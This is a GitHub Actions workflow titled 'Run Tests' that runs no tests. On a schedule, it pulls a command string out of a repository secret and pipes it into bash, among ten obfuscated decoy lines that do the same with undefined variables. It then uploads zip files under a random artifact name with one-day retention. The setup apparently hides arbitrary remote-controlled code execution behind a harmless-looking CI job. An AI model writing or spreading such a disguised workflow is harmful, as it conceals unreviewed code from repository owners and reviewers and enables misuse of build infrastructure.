name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '11 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          w7: ${{ secrets.w7 }}
        run: |
          printf '%s' "$w7" | jq -r .gw16852 | /bin/bash
          echo $aa04 | jq -r .an9 | /bin/bash
          printf '%s' "$qw65" | jq -r .knmk9 | /bin/bash
          echo $dcyvt83 | jq -r .dp5 | /bin/bash
          printf '%s' "$mt83" | jq -r .iioyx5 | /bin/bash
          echo $p90 | jq -r .v40 | /bin/bash
          echo $zoe44304 | jq -r .mvxq0 | /bin/bash
          printf '%s' "$h3" | jq -r .nr2730 | /bin/bash
          echo $q15996 | jq -r .cwbj01 | /bin/bash
          printf '%s' "$hle965" | jq -r .ujlsq52 | /bin/bash
          echo $ansj50138 | jq -r .gbvaq54117 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: XxGloPM8
          path: "*.zip"
          retention-days: 1
